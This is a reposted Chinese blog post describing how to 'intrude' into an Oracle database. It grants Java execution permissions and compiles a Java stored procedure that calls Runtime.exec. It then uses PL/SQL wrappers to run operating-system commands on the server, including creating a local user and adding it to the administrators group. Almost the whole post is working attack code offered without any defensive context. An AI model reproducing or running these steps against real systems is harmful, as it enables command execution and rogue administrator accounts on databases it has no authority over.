oracle----入侵oracle测试

exec dbms_java.grant_permission( 'FLY', 'SYS:java.io.FilePermission', '<>', 'execute');
grant javasyspriv to fly;


create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
return RC;
}
}
}


第二步:
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';

第三步:
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;


set serveroutput on
exec dbms_java.set_output(100000);



variable x varchar2(4000);
exec :x := RUN_CMz('net1 user');
exec :x := RUN_CMz('ipconfig');


exec :x := RUN_CMz('net1 user huang huang /add');
exec :x := RUN_CMz('net1 localgroup administrators huang /add');


exec :x := RUN_CMz('net1 user huang /del');

[@more@]

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/26078027/viewspace-1052778/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/26078027/viewspace-1052778/

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值